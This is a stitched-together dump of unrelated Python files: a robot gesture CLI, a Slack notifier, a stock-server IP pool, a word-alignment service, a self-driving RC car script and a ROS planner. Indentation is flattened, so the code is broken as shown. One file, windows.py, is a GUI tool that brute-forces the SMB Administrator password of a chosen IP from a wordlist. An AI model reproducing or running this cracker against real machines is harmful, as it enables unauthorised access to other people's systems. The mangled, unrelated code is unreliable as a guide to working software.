print(self.help_text)
def run_cli(self):
"""
Handle CLI inputs indefinitely
Will split off / or | and keep subsequent parts as a list of args
"""
print("\nRunning CLI")
while(1):
# get command string
cmd_str = input("Enter a command ('l' for a list, 'h' for help, 'c' to create a new sequence):")
if cmd_str =="exit": break
cmd_string = re.split('/| ', cmd_str)
cmd = cmd_string[0]
# parse to get argument
args = None
if (len(cmd_string) > 1):
args = cmd_string[1:]
# handle the command and arguments
did_quit = self.handle_input(cmd, args)
if did_quit == 'q': break
print("\nCLI Loop Exit")
def handle_input(self, cmd, args=[]):
"""
handle CLI input
Args:
robot: the robot affected by the given command
cmd: a robot command
args: additional args for the command
"""
if cmd == 's' or cmd == 'rand':
self.play_sequence(cmd, args)
elif cmd == 'r':
# reload gestures
self.robot.load_all_sequences()
elif cmd == 'l' or cmd == 'ls':
self.print_available_sequences(args)
elif cmd == 'q':
self.graceful_exit()
return 'q'
elif cmd == 'm':
self.control_motor(args)
elif cmd == 'e':
self.robot.speed = float(input('Choose Speed factor [range: (0.5 to 2.0)]: '))
elif cmd == 'a':
self.robot.amp = float(input('Choose Amplitude factor [range: (0.5 to 2.0)]: '))
elif cmd == 'p':
self.robot.post = float(input('Choose Posture factor [range: (-150 to 150)]: '))
elif cmd == 'h':
self.print_help()
elif cmd == 'c':
self.prompt_new_sequence()
elif cmd == '':
self.handle_input(self.prior_cmd, self.prior_args)
return ''
elif cmd in self.robot.seq_list.keys():
# directly call a sequence (skip 's')
self.handle_input('s', [cmd])
elif any(cmd in seq_name for seq_name in self.robot.seq_list.keys()):
# directly call a random sequence by partial name match
if 'mix' not in cmd:
seq_list = [seq_name for seq_name in self.robot.seq_list.keys() if cmd in seq_name and 'mix' not in seq_name]
else:
seq_list = [seq_name for seq_name in self.robot.seq_list.keys() if cmd in seq_name]
if len(seq_list) == 0:
print("No sequences matching name: %s" % (cmd))
return ''
self.handle_input('s', [random.choice(seq_list)])
cmd = cmd
else:
print("Invalid input")
return ''
self.prior_cmd, self.prior_args = cmd, args
return ''
def play_sequence(self, cmd, args):
print("Playing Sequence: ", cmd, args)
idle_sep = '='
# if random, choose random sequence
if cmd == 'rand':
args = [random.choice(list(self.robot.seq_list.keys()))]
# default to not idling
# idler = False
# get sequence if not given
if not args:
args = ['']
seq = input('Sequence: ')
else:
seq = args[0]
# check if should be idler
# elif (args[0] == 'idle'):
# args[0] = args[1]
# idler = True
idle_seq = ''
if (idle_sep in seq):
(seq, idle_seq) = re.split(idle_sep + '| ', seq)
# catch hardcoded idle sequences
if(seq == 'random'):
random.seed(time.time())
seq = random.choice(['calm', 'slowlook', 'sideside'])
if(idle_seq == 'random'):
random.seed(time.time())
idle_seq = random.choice(['calm', 'slowlook', 'sideside'])
if (seq == 'calm' or seq == 'slowlook' or seq == 'sideside'):
idle_seq = seq
# play the sequence if it exists
if seq in self.robot.seq_list:
# print("Playing sequence: %s"%(args[0]))
# iterate through all robots
if not self.robot.seq_stop:
self.robot.seq_stop = threading.Event()
self.robot.seq_stop.set()
print(seq)
seq_thread = self.robot.play_recording(seq, idler=False)
# go into idler
if (idle_seq != ''):
while (seq_thread.is_alive()):
# sleep necessary to smooth motion
time.sleep(0.1)
continue
if not self.robot.seq_stop:
self.robot.seq_stop = threading.Event()
self.robot.seq_stop.set()
self.robot.play_recording(idle_seq, idler=True)
# sequence not found
else:
print("Unknown sequence name:", seq)
return
def print_available_sequences(self, args):
if args:
args[0] = args[0].replace('*', '')
for seq_name in self.robot.seq_list.keys():
# skip if argument is not in the current sequence name
if args and args[0] != seq_name[:len(args[0])]:
continue
print(seq_name)
def graceful_exit(self):
"""
Close the robot object and clean up any temporary files.
Manually kill the flask server because there isn't an obvious way to do so gracefully.
"""
# clean up tmp dirs and close robots
tmp_dir = './src/sequences/%s/tmp' % self.robot.name
if os.path.exists(tmp_dir):
shutil.rmtree(tmp_dir)
self.robot.robot.close()
print("Bye!")
def control_motor(self, args):
# get motor and pos if not given
if not args:
args = ['', '']
args[0] = input('Motor (1-3): ')
args[1] = input('Position: ')
if (args[0] == 'all'):
self.robot.goto_position({'tower_1': float(args[1]), 'tower_2': float(
args[1]), 'tower_3': float(args[1])}, 0, True)
else:
self.robot.goto_position({str('tower_'+args[0]): float(args[1])}, 0, True)
def prompt_new_sequence(self):
all_pos = []
millis = 0
new_sequence = input('Please enter the name of sequence you would like to create (enter q to exit): ')
if new_sequence == 'q':return
new_cmd = ''
while(new_cmd != 's'):
new_cmd = self.change_motors()
if(new_cmd == 's'):
new_pos = [{'dof':key,"pos":(value/50+3)} for key,value in self.robot.get_motor_pos().items()]
all_pos.append({"positions":new_pos, "millis": millis})
millis+=3000
new_cmd = input("\nEnter s to save this as your final sequence." +
" Enter p to add another position to this sequence: ")
self.write_position_to_json(all_pos, new_sequence)
#allows the user to change the position of the robot using arrow keys. command is c
def change_motors(self):
moving_motor = input("Enter a motor ID to shift the motor (1, 2, or 3). Press e to end: ")
while(moving_motor != 'e'):
#if one of the tower motors is being controlled
if(int(moving_motor) > 0 and int(moving_motor) < 4):
tower = 'tower_' + str(moving_motor)
print("\n\nUse the up/down arrow keys to move motor " + moving_motor +
".\nPress e to stop moving the motor.\n\n")
key = ord(getch())
if(key == 27):
getch()
key = ord(getch())
if(key == 65):
current_pos = self.robot.get_indiv_motor_pos(tower)
if(current_pos < 140):
self.robot.goto_position({tower: float(current_pos+20)}, 0, True)
else:
self.robot.goto_position({tower: float(150)}, 0, True)
elif(key == 66):
current_pos = self.robot.get_indiv_motor_pos(tower)
if(current_pos > -30):
self.robot.goto_position({tower: float(current_pos-20)}, 0, True)
else:
self.robot.goto_position({tower: float(-40)}, 0, True)
if(key == 101):
moving_motor = 'e'
to_return = input("Press s to save your motor configuration, or m to move another motor: ")
return to_return
#return #str that determines if user is moving more motors or if user is saving motor config
#allows user to save the robots current position to a json file
def write_position_to_json(self, all_pos, new_sequence):
new_sequence = new_sequence + "_sequence.json"
data = {"animation":new_sequence, "frame_list": all_pos}
json_str = json.dumps(data, indent=4)
print(json_str)
target_path = './blossompy/src/sequences/woody/customized'
if not os.path.exists(target_path):
try:
os.makedirs(target_path)
except Exception as e:
print(e)
raise
with open(os.path.join(target_path, new_sequence), 'w') as f:
json.dump(data, f, indent = 4)
# def main(args):
# """
# Start robots, start up server, handle CLI
# ToDo: the multi-robot setup should be a separate file
# """
# # get robots to start
# # use first name as master
# configs = RobotConfig().get_configs(args.names)
# master_robot = SequenceRobot(args.names[0], configs[args.names[0]])
# configs.pop(args.names[0])
# master_robot.reset_position()
# # start CLI
# cli = CLI(master_robot)
# t = threading.Thread(target=cli.run_cli)
# t.daemon = True
# t.start()
# while True:
# time.sleep(1)
# def parse_args(args):
# """
# Parse arguments from starting in terminal
# args:
# args the arguments from terminal
# returns:
# parsed arguments
# """
# parser = argparse.ArgumentParser()
# parser.add_argument('--names', '-n', type=str, nargs='+',
# help='Name of the robot.', default=["woody"])
# return parser.parse_args(args)
# """
# Generic main handler
# """
# if __name__ == "__main__":
# main(parse_args(sys.argv[1:]))
|
slack.py
|
'''
Use a 'bot' to post message to a Slack channel.
This is useful for error alerts and scheduled notifications.
'''
import json
import threading
import urllib.request
import arrow
# Reference:
# search for 'incoming webhooks for slack'
def post(channel_webhook_url: str, subject: str, text: str) -> None:
dt = arrow.utcnow().to('US/Pacific').format('YYYY-MM-DD HH:mm:ss') + ' Pacific'
json_data = json.dumps({
'text': '--- {} ---\n{}\n{}'.format(subject, dt, text)
}).encode('ascii')
req = urllib.request.Request(
channel_webhook_url, data=json_data,
headers={'Content-type': 'application/json'})
thr = threading.Thread(target=urllib.request.urlopen, args=(req, ))
thr.start()
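# Minimal usage sketch (illustrative only): the webhook URL below is a
# placeholder and must be replaced with a real Slack incoming-webhook URL.
if __name__ == '__main__':
    post('https://hooks.slack.com/services/T000/B000/XXXXXXXX',
         subject='nightly-job', text='backfill finished without errors')
    # post() returns immediately; the HTTP request runs on a background thread.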
|
ippool.py
|
#utf-8
import random
import threading
from functools import partial
from pytdx.log import DEBUG, log
import time
from collections import OrderedDict
"""
ips should be a list of (ip, port) pairs, e.g.
[
(ip1, port1),
(ip2, port2),
(ip3, port3),
]
"""
class BaseIPPool(object):
def __init__(self, hq_class):
self.hq_class = hq_class
def setup(self):
pass
def teardown(self):
pass
def sync_get_top_n(self, num):
pass
def add_to_pool(self, ip):
pass
class RandomIPPool(BaseIPPool):
"""
Return the IPs in a random priority order.
"""
def __init__(self, hq_class, ips):
"""
:param ips: ip should be a list
"""
super(RandomIPPool, self).__init__(hq_class)
self.ips = ips
def get_ips(self):
random.shuffle(self.ips)
return self.ips
def sync_get_top_n(self, num):
ips= self.get_ips()
return ips[:num]
def add_to_pool(self, ip):
if ip not in self.ips:
self.ips.append(ip)
class AvailableIPPool(BaseIPPool):
"""
Test connectivity and order the IPs by connection speed.
A worker thread is started to refresh the ordering periodically.
"""
def __init__(self, hq_class, ips):
super(AvailableIPPool, self).__init__(hq_class)
self.ips = ips
self.sorted_ips = None
self.worker_thread = None
self.sorted_ips_lock = threading.Lock()
self.stop_event = threading.Event()
self.wait_interval = 20 * 60
def setup(self):
super(AvailableIPPool, self).setup()
self.worker_thread = threading.Thread(target=self.run)
self.worker_thread.start()
def get_ips(self):
if not self.sorted_ips:
return self.ips
else:
return list(self.sorted_ips.values())
def teardown(self):
self.stop_event.set()
if self.worker_thread.is_alive():
self.worker_thread.join()
self.worker_thread = None
def run(self):
log.debug("pool thread start ")
while not self.stop_event.is_set():
_available_ips = self.get_all_available_ips()
sorted_keys = sorted(_available_ips)
with self.sorted_ips_lock:
self.sorted_ips = OrderedDict((key, _available_ips[key]) for key in sorted_keys)
self.stop_event.wait(self.wait_interval)
def get_all_available_ips(self):
"""
Loop over all hosts and test the connection speed and availability of each.
:return:
"""
_available_ips = OrderedDict()
for ip in self.ips:
ip_addr, port = ip
api = self.hq_class(multithread=False, heartbeat=False)
try:
with api.connect(ip_addr, port):
start_ts = time.time()
api.do_heartbeat()
end_ts = time.time()
diff_ts = end_ts - start_ts
_available_ips[diff_ts] = ip
log.debug("time diff is %f for %s" % (diff_ts, _available_ips))
except Exception as e:
log.debug("can not use %s:%d the exception is %s" % (ip_addr, port, str(e)))
continue
return _available_ips
def sync_get_top_n(self, num):
_ips = list(self.get_all_available_ips().values())
return _ips[:min(len(_ips), num)]
def add_to_pool(self, ip):
if ip not in self.ips:
self.ips.append(ip)
if __name__ == "__main__":
from pytdx.hq import TdxHq_API
from pytdx.config.hosts import hq_hosts
import logging
log.setLevel(logging.DEBUG)
ch = logging.StreamHandler()
ch.setLevel(logging.DEBUG)
# create formatter
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
# add formatter to ch
ch.setFormatter(formatter)
log.addHandler(ch)
ips = [(v[1], v[2]) for v in hq_hosts]
pool = AvailableIPPool(TdxHq_API, ips)
pool.wait_interval = 60 * 5
pool.setup()
sleep_time = 130
log.debug("ready to sleep %d" % sleep_time )
time.sleep(sleep_time)
log.debug("sleep done")
ips = pool.get_ips()
log.debug(str(pool.get_ips()))
log.debug("ready to teardown")
pool.teardown()
|
services.py
|
import os
import subprocess
import sys
import threading
from subprocess import PIPE, Popen
# Not used now, leaving it here for future use with command line tools
class LineSubProcess(object):
"""
Class to communicate with arbitrary line-based bash scripts.
Uses various mechanisms to enforce line buffering.
# When calling python scripts ...
You need to use -u flag, e.g. `python -u my_script.py`
instead of `python my_script.py` to prevent python interpreter's
internal buffering.
"""
# TODO: handle stderr
# Prefixing a command with this sets up
# stdout & stderr buffering to line-based:
prefix = "stdbuf -oL -eL "
@staticmethod
def get_process(command):
stderr = sys.stderr if has_fileno(sys.stderr) else None
return Popen(
LineSubProcess.prefix + command,
shell=True, # enable entering whole command as a single string
bufsize=1, # line buffer
universal_newlines=True, # string-based input/output
stdin=PIPE,
stdout=PIPE,
stderr=stderr
)
def __init__(self, command):
"""
...
Make sure the given command does not buffer input/output by itself.
"""
self.command = command
self.process = LineSubProcess.get_process(self.command)
def __call__(self, line):
assert "\n" not in line
try:
self.process.stdin.write(line + "\n")
except ValueError:
# In the case the process has died for some reason,
# try to invoke it once again.
self.process = LineSubProcess.get_process(self.command)
self.process.stdin.write(line + "\n")
return self.process.stdout.readline().strip()
def __del__(self):
self.process.kill()
def get_joined_json_from_json(data, tool):
for i in range(len(data["sentences"])):
print ("%s:%s"%(i,data["sentences"][i]))
print(data["sentences"][i]["tgt"]['text'])
#data[i]["src"]["text"]=data[i]["tgt"]["text"]
data["sentences"][i]["tgt"]["text"]=tool(data["sentences"][i]["tgt"]["text"])
return data
# Simplified, non-threadsafe version for force_align.py
# Use the version in realtime for development
class Aligner:
def __init__(self, fwd_params, fwd_err, rev_params, rev_err, heuristic='grow-diag-final-and', build_root="/doc_translation/fast_align/build"):
fast_align = os.path.join(build_root, 'fast_align')
atools = os.path.join(build_root, 'atools')
(fwd_T, fwd_m) = self.read_err(fwd_err)
(rev_T, rev_m) = self.read_err(rev_err)
fwd_cmd = [fast_align, '-i', '-', '-d', '-T', fwd_T, '-m', fwd_m, '-f', fwd_params]
rev_cmd = [fast_align, '-i', '-', '-d', '-T', rev_T, '-m', rev_m, '-f', rev_params, '-r']
tools_cmd = [atools, '-i', '-', '-j', '-', '-c', heuristic]
self.fwd_align = popen_io(fwd_cmd)
self.rev_align = popen_io(rev_cmd)
self.tools = popen_io(tools_cmd)
def __call__(self, line):
self.fwd_align.stdin.write('{}\n'.format(line))
self.rev_align.stdin.write('{}\n'.format(line))
# f words ||| e words ||| links ||| score
fwd_line = self.fwd_align.stdout.readline().split('|||')[2].strip()
rev_line = self.rev_align.stdout.readline().split('|||')[2].strip()
self.tools.stdin.write('{}\n'.format(fwd_line))
self.tools.stdin.write('{}\n'.format(rev_line))
al_line = self.tools.stdout.readline().strip()
return al_line
def close(self):
self.fwd_align.stdin.close()
self.fwd_align.wait()
self.rev_align.stdin.close()
self.rev_align.wait()
self.tools.stdin.close()
self.tools.wait()
def read_err(self, err):
(T, m) = ('', '')
for line in open(err):
# expected target length = source length * N
if 'expected target length' in line:
m = line.split()[-1]
# final tension: N
elif 'final tension' in line:
T = line.split()[-1]
return (T, m)
def popen_io(cmd):
p = subprocess.Popen(cmd, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE, bufsize=1, universal_newlines=True)
def consume(s):
for _ in s:
pass
threading.Thread(target=consume, args=(p.stderr,)).start()
return p
class AlignerService:
def __init__(self, iterable=(), **kwargs):
self.__dict__.update(iterable, **kwargs)
self.aligner = Aligner(self.fwd_params,self.fwd_err,self.rev_params,self.rev_err)
print(self.__dict__)
def do(self, data):
for i in range(len(data["sentences"])):
src=data["sentences"][i]["src"]["text"]
tgt=data["sentences"][i]["tgt"]["text"]
if src.isspace() or tgt.isspace() or src=='' or tgt=='':
a=''
else:
a=self.aligner(' ||| '.join((data["sentences"][i]["src"]["text"], data["sentences"][i]["tgt"]["text"])))
data["sentences"][i]["alignment"]=a
return data
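# Minimal usage sketch (illustrative only): the model paths below are
# placeholders for files produced by a fast_align training run, and Aligner's
# build_root default must point at a fast_align checkout with built binaries.
if __name__ == '__main__':
    service = AlignerService(fwd_params='models/fwd.params', fwd_err='models/fwd.err',
                             rev_params='models/rev.params', rev_err='models/rev.err')
    doc = {"sentences": [{"src": {"text": "hello world"},
                          "tgt": {"text": "hallo welt"}}]}
    # do() fills an "alignment" string (e.g. "0-0 1-1") into each sentence entry.
    print(service.do(doc)["sentences"][0]["alignment"])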
|
autonomous_v7.py
|
'''
Notes:
After executing ctrl-z, the nn isn't taking the second-best proba from the previous prediction array.
It's making a new prediction, and then going with the second-best from that array.
In v.8, make it take the second-best from the previous prediction.
'''
import car
import cv2
import numpy as np
import os
import serial
import socket
import threading
import time
from imutils.object_detection import non_max_suppression
from keras.layers import Dense, Activation
from keras.models import Sequential
import keras.models
dir_log = []
SIGMA = 0.40
stop_classifier = cv2.CascadeClassifier('cascade_xml/stop_sign_pjy.xml')
timestr = time.strftime('%Y%m%d_%H%M%S')
class RCDriver(object):
def steer(self, prediction):
# FORWARD
if np.all(prediction == [ 0., 0., 1.]):
car.forward(150)
car.pause(300)
dir_log.append('Forward')
print 'Forward'
# FORWARD-LEFT
elif np.all(prediction == [ 1., 0., 0.]):
car.left(300)
car.forward_left(200)
car.left(700)
car.pause(200)
dir_log.append('Left')
print 'Left'
# FORWARD-RIGHT
elif np.all(prediction == [ 0., 1., 0.]):
car.right(300)
car.forward_right(200)
car.right(700)
car.pause(200)
dir_log.append('Right')
print 'Right'
def stop(self):
print '* * * STOPPING! * * *'
car.pause(5000)
rcdriver = RCDriver()
class ObjectDetection(object):
global rcdriver
global stop_classifier
def detect(self, cascade_classifier, gray_image, image):
# STOP SIGN
stop_sign_detected = cascade_classifier.detectMultiScale(
gray_image,
scaleFactor=1.1,
minNeighbors=10,
minSize=(35, 35),
maxSize=(45, 45))
# Draw a rectangle around stop sign
for (x_pos, y_pos, width, height) in stop_sign_detected:
cv2.rectangle(image, (x_pos+5, y_pos+5), (x_pos+width-5, y_pos+height-5), (0, 0, 255), 2)
cv2.putText(image, 'STOP SIGN', (x_pos, y_pos-10), cv2.FONT_HERSHEY_SIMPLEX, 0.4, (0, 0, 255), 2)
# Execute the full stop
if np.any(stop_sign_detected):
rcdriver.stop()
# PEDESTRIAN
hog = cv2.HOGDescriptor()
hog.setSVMDetector(cv2.HOGDescriptor_getDefaultPeopleDetector())
orig = image.copy()
# Look for pedestrians in the image
(rects, weights) = hog.detectMultiScale(image, winStride=(4, 4),
padding=(8, 8), scale=1.05)
# Draw the ORIGINAL bounding boxes
for (x, y, w, h) in rects:
cv2.rectangle(orig, (x, y), (x + w, y + h), (0, 0, 255), 2)
# Apply 'non-maxima suppression' to the bounding boxes using a fairly large overlap threshold to try to maintain overlapping
# boxes that are still people
rects = np.array([[x, y, x + w, y + h] for (x, y, w, h) in rects])
pick = non_max_suppression(rects, probs=None, overlapThresh=0.65)
# Draw the FINAL bounding boxes
for (xA, yA, xB, yB) in pick:
cv2.rectangle(image, (xA, yA), (xB, yB), (0, 255, 0), 2)
cv2.putText(image, 'PEDESTRIAN', (xA, yA-10), cv2.FONT_HERSHEY_SIMPLEX, 0.4, (0, 255, 0), 2)
obj_detection = ObjectDetection()
class TrustButVerify(object):
global dir_log
def __init__(self):
# Arbitrarily designating a 'corner' as some % of width from either edge (e.g. 15%)
self.corner_pct = .15
def scan_for_signal(self, filtered_img):
# Lower Left and Right corners
last_row = filtered_img[-1]
img_total_width = len(last_row)
img_corner_width = int(img_total_width * self.corner_pct)
left_corner = last_row[ : img_corner_width + 1]
right_corner = last_row[ -img_corner_width : ]
# GOAL: Need a sum of at least 255 in each corner, which means at least the edge of a lane marker is visible in both corners
# If either corner < 255, then return False to activate ctrl-z mode
if sum(left_corner) < 255 or sum(right_corner) < 255:
print 'SIGNAL IN ONE CORNER NOT PRESENT'
return False
return True
def ctrl_z(self):
print '\n< < < CTRL-Z MODE ACTIVATED! > > >'
last_dir = dir_log[-1]
# Forward -> Reverse
if last_dir == 'Forward':
car.reverse(200)
car.pause(500)
print '< REVERSE >'
# Left -> Reverse-Left
elif last_dir == 'Left':
car.left(300)
car.reverse_left(250)
car.left(700)
car.pause(500)
print '< REVERSE-LEFT >'
# Right -> Reverse-Right
elif last_dir == 'Right':
car.right(300)
car.reverse_right(250)
car.right(700)
car.pause(500)
print '< REVERSE-RIGHT >'
return
TBV = TrustButVerify()
class NeuralNetwork(object):
global stop_classifier
global timestr
def __init__(self, receiving=False, piVideoObject=None):
self.ctrl_z_mode = False
self.receiving = receiving
self.model = keras.models.load_model('nn_h5/nn.h5')
# PiVideoStream class object is now here.
self.piVideoObject = piVideoObject
self.rcdriver = RCDriver()
print 'NeuralNetwork_init OK'
self.fetch()
def auto_canny(self, blurred):
# Compute the median of the single channel pixel intensities
global SIGMA
v = np.median(blurred)
# Apply automatic Canny edge detection using the computed median of the image
lower = int(max(0, (1.0 - SIGMA) * v))
upper = int(min(255, (1.0 + SIGMA) * v))
edged = cv2.Canny(blurred, lower, upper)
return edged
def preprocess(self, frame):
image_array = frame.reshape(1, 38400).astype(np.float32)
image_array = image_array / 255.
return image_array
def predict(self, image):
image_array = self.preprocess(image)
y_hat = self.model.predict(image_array)
i_max = np.argmax(y_hat)
y_hat_final = np.zeros((1,3))
np.put(y_hat_final, i_max, 1)
return y_hat_final[0], y_hat
def predict_second_best(self, image):
image_array = self.preprocess(image)
y_hat = self.model.predict(image_array)
print 'y_hat:', y_hat
y_hat_list = []
for each in y_hat[0]:
y_hat_list.append(each)
print 'y_hat as list', y_hat_list
i_max_second = np.argsort(y_hat_list)[::-1][1]
print 'i_max_second', i_max_second
y_hat_final = np.zeros((1,3))
np.put(y_hat_final, i_max_second, 1)
return y_hat_final[0], y_hat
def fetch(self):
frame = 0
while self.receiving:
# There's a chance that the Main thread can get to this point before the New thread begins streaming images.
# To account for this, we create the jpg variable but set to None, and keep checking until it actually has something.
jpg = None
while jpg is None:
jpg = self.piVideoObject.frame
gray = cv2.imdecode(np.fromstring(jpg, dtype=np.uint8), cv2.IMREAD_GRAYSCALE)
image = cv2.imdecode(np.fromstring(jpg, dtype=np.uint8), cv2.IMREAD_UNCHANGED)
# Object detection
obj_detection.detect(stop_classifier, gray, image)
# Lower half of the grayscale image
roi = gray[120:240, :]
# Apply GuassianBlur (reduces noise)
blurred = cv2.GaussianBlur(roi, (3, 3), 0)
# Apply Canny filter
auto = self.auto_canny(blurred)
# Show streaming images
cv2.imshow('Original', image)
cv2.imshow('What the model sees', auto)
# *** NEW FEATURE: Trust but verify (TBV) ***
# Check for signal in lower corners of image (boolean). If True, then s'all good. If Not, then...
if not TBV.scan_for_signal(auto):
# TBV.ctrl_z() takes car back one step, then ctrl_z_mode is now True.
TBV.ctrl_z()
self.ctrl_z_mode = True
continue # return to top of while loop to get a fresh jpg
# If TBV.scan_for_signal() returned False, ctrl_z_mode is now True. Proceed with model's second best prediction.
if self.ctrl_z_mode:
prediction, probas = self.predict_second_best(auto)
# Switch ctrl_z_mode back to False.
self.ctrl_z_mode = False
# If TBV.scan_for_signal returned True, then all is well. ctrl_z_mode is False, and model makes prediction on argmax proba.
else:
prediction, probas = self.predict(auto)
# Save frame and prediction record for debugging research
prediction_english = None
prediction_english_proba = None
proba_left, proba_right, proba_forward = probas[0]
if np.all(prediction == [ 0., 0., 1.]):
prediction_english = 'FORWARD'
prediction_english_proba = proba_forward
elif np.all(prediction == [ 1., 0., 0.]):
prediction_english = 'LEFT'
prediction_english_proba = proba_left
elif np.all(prediction == [ 0., 1., 0.]):
prediction_english = 'RIGHT'
prediction_english_proba = proba_right
# Text on saved image
cv2.putText(gray, "Prediction (sig={}): {}, {:>05}".format(SIGMA, prediction_english, prediction_english_proba), (10, 20), cv2.FONT_HERSHEY_SIMPLEX, .45, (255, 255, 0), 1)
cv2.putText(gray, "Forward: {}".format(proba_forward), (10, 40), cv2.FONT_HERSHEY_SIMPLEX, .45, (255, 255, 0), 1)
cv2.putText(gray, "Left: {}".format(proba_left), (10, 60), cv2.FONT_HERSHEY_SIMPLEX, .45, (255, 255, 0), 1)
cv2.putText(gray, "Right: {}".format(proba_right), (10, 80), cv2.FONT_HERSHEY_SIMPLEX, .45, (255, 255, 0), 1)
cv2.imwrite('test_frames_temp/frame{:>05}.jpg'.format(frame), gray)
frame += 1
# Send prediction to driver to tell it how to steer
self.rcdriver.steer(prediction)
if cv2.waitKey(1) & 0xFF == ord('q'):
self.stop()
cv2.destroyAllWindows()
class PiVideoStream(object):
def __init__(self):
self.server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# self.server_socket.bind(('192.168.1.66', 8000)) # The IP address of your computer (Paul's MacBook Air). This script should run before the one on the Pi.
self.server_socket.bind(('10.10.10.2', 8000)) # The IP address of your computer (Paul's MacBook Air). This script should run before the one on the Pi.
print 'Listening...'
self.server_socket.listen(0)
# Accept a single connection ('rb' is 'read binary')
self.connection = self.server_socket.accept()[0].makefile('rb')
# initialize the frame and the variable used to indicate
# if the thread should be stopped
self.frame = None
self.stopped = False
self.stream_bytes = ' '
self.start()
def start(self):
# start the thread to read frames from the video stream
print 'Starting PiVideoStream thread...'
print ' \"Hold on to your butts!\" '
# Start a new thread
t = threading.Thread(target=self.update, args=())
t.daemon=True
t.start()
print '...thread running'
# Main thread diverges from the new thread and activates the neural_network
# The piVideoObject argument ('self') passes the PiVideoStream class object to NeuralNetwork.
NeuralNetwork(receiving=True, piVideoObject=self)
def update(self):
while True:
self.stream_bytes += self.connection.read(1024)
first = self.stream_bytes.find('\xff\xd8')
last = self.stream_bytes.find('\xff\xd9')
if first != -1 and last != -1:
self.frame = self.stream_bytes[first:last + 2]
self.stream_bytes = self.stream_bytes[last + 2:]
def read(self):
# return the frame most recently read
return self.frame
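    def stop(self):
        # Added to complete the video_stream.stop() call in the KeyboardInterrupt handler below;
        # it simply flags the stream as stopped via the `self.stopped` attribute set in __init__.
        self.stopped = True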
if __name__ == '__main__':
try:
# Create an instance of PiVideoStream class
video_stream = PiVideoStream()
except KeyboardInterrupt:
# Rename the folder that collected all of the test frames. Then make a new folder to collect next round of test frames.
os.rename( './test_frames_temp', './test_frames_SAVED/test_frames_{}'.format(timestr))
os.makedirs('./test_frames_temp')
print '\nTerminating...\n'
car.pause(10000)
# Close video_stream thread.
video_stream.stop()
video_stream.connection.close()
# Close serial connection to Arduino controller.
ser = serial.Serial(port.device, 9600)
ser.close()
print '\nDone.\n'
|
windows.py
|
import fs.smbfs
from tkinter import*
from tkinter import messagebox
import threading
#--------------------------SMb---------------------
number = 0
password_list = []
bools = True
def read(target,numbers):
global number
global password_list
messagebox.showinfo("密码破解","破解开始,详情请见命令行")
print('开始破解')
path = 'pwd.txt'
file = open(path,'r')
while bools:
try:
pwd = file.readline()
fs.smbfs.SMBFS(host=target, username='Administrator', passwd=pwd)#不断尝试密码
except AttributeError:
print('错误的IP')
except:
password_list.append(pwd)
if number == 10:
print('[-]密码错误 --number=10:',password_list)
number = 0
else:
number = number + 1
else:
print('[*]密码正确:',pwd)
passwd = '密码破解成功 Administrator:'+pwd
messagebox.showinfo("密码破解",passwd)
return True
break
def start_password():
global bools
target = en.get()
numbers = 1
bools = True
t = threading.Thread(target=read,args=(target,numbers))
t.start()
def stop_password():
global bools
bools = False
messagebox.showinfo("密码破解","破解结束结束")
return True
#---------------------------------------------------
tk = Tk()
tk.title('密码破解-windows')
tk.geometry('300x160+420+200')
#----------------------------------------------------
en = Entry(tk)
en.place(x=80,y=40)
#--------------------------text------------------
w= Label(tk,text='目标IP:',fg="red")
w.place(x=20,y=40)
#------------------------start or stop----------------
b = Button(tk, text ="开始破解", command=start_password)
b.place(x=20,y=80)
b_2 = Button(tk, text ="停止", command=stop_password)
b_2.place(x=200,y=80)
#------------------------start-GUI--------------------
tk.mainloop()
#-------------------------over-------------------------
|
planner.py
|
#!/usr/bin/env python
#-*- coding:utf-8 -*-
import threading,math
import rospy,tf
from geometry_msgs.msg import Twist
from std_msgs.msg import *
planner_status = False
steering_last = 0.0
def start_planner_sub(data):
global planner_status
planner_status = data.data
print 'planner_status = ',planner_status
def planner_publisher():
global planner_status
global steering_last
throttle_control = 0
steering_control = 0
throttle_limit = 100
steering_limit = 20
stop_dist = 0.5
target_x_dist_limit = 0.2
throttle_speed = 50
target_x_dist = 0
linear = 0
angular = 0
angular_P_gain = 1.0
linear_P_gain = 1.0
steering_angle_pub = rospy.Publisher('/steering_angle', Int16, queue_size=5)
throttle_pub = rospy.Publisher('/throttle', Int16, queue_size=5)
tf_listener = tf.TransformListener()
pose = []
rate = rospy.Rate(3)
throttle_msg = Int16()
steering_angle_msg = Int16()
throttle_msg.data = 0
steering_angle_msg.data = 0
while not rospy.is_shutdown():
try:
(trans, rot) = tf_listener.lookupTransform('/footprint_head', '/target', rospy.Time(0))
angular = 1.0 * math.atan2(trans[1], trans[0])
linear = 1.0 * math.sqrt(trans[0] ** 2 + trans[1] ** 2)
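            # Shrink the angular P-gain for targets further than 2 m so the heading correction stays gentle.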
if linear > 2.0:
angular_P_gain = 2.0/linear
else:
angular_P_gain = 1.0
angular = angular_P_gain * angular
linear = linear_P_gain * linear
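            # Smooth the steering command: a 50/50 exponential blend of the previous value
            # and the new target bearing (converted to degrees and negated for steering sense).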
steering_last = steering_last*0.5 + math.degrees(-angular)*0.5
target_x_dist = trans[0]
# print 'x = ',target_x_dist
if linear > stop_dist and abs(target_x_dist) > target_x_dist_limit:
throttle_control = throttle_speed
steering_control = int(steering_last)
if linear > stop_dist and abs(target_x_dist) <= target_x_dist_limit:
print 'Position Shift! cannot be reached'
throttle_control = 0
steering_control = 0
if linear <= stop_dist: #distance limit
throttle_control = 0
except (tf.LookupException, tf.ConnectivityException, tf.ExtrapolationException) as e:
throttle_control = 0
steering_control = 0
planner_status = False
print e
if throttle_control >= throttle_limit:
throttle_control = throttle_limit
elif throttle_control <= -throttle_limit:
throttle_control = -throttle_limit
if steering_control >= steering_limit:
steering_control = steering_limit
elif steering_control <= -steering_limit:
steering_control = -steering_limit
# print 'target_dist = ',linear
# print 'target_angle_degree = ',math.degrees(-angular)
if planner_status:
print 'steering_control_degree = ',steering_control
throttle_msg.data = throttle_control
steering_angle_msg.data = steering_control
throttle_pub.publish(throttle_msg),
steering_angle_pub.publish(steering_angle_msg)
rate.sleep()
if __name__ == '__main__':
rospy.init_node('simple_planner', anonymous=False)
rospy.Subscriber('start_planner', Bool, start_planner_sub)
rate = rospy.Rate(3)
# t = threading.Thread(target=start_planner_loop)
# t.daemon = True
# t.start()
planner_publisher()
|
main.py
|
'''
Project: Kail Birthday Present
